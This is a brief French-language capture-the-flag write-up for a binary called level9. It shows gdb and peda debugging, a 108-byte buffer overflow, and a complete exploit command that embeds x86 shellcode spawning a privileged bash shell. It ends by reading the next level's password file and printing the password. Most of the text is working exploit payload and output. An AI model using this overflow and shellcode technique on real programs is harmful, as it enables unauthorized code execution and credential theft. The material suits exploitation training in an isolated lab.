Note: Installer peda si cela n'est pas deja fait.

gdb ./level9

info function:
-----> Le binaire contient la fonction main et la class N.

source /tmp/peda/peda.py
set disassembly-flavor intel

./level9 $(python -c "print('A' * 109)")
Segmentation fault (core dumped)

dans peda:
break avant la fin.
./level9 $(python -c "print('A' * 108 + '\x08\x04\xa0\x0c'[::-1])")
x/wx 0804a00c
A RETESTER
-> normalement pointe sur 0804a010

shellcodeaddr + shellcode + (108 - 4 - len_shellcode) + adrr_debut
addr_debut :   \x08\x04\xa0\x0c
shellcodeaddr: \x08\x04\xa0\x0c + 4 = \x08\x04\xa0\x10

r $(python -c "print('\x08\x04\xa0\x10'[::-1] + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80' + 'A' * 71 + '\x08\x04\xa0\x0c'[::-1])")

--> sh est lance.
$ cd /home/user/bonus0
$ cat .pass

---> f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
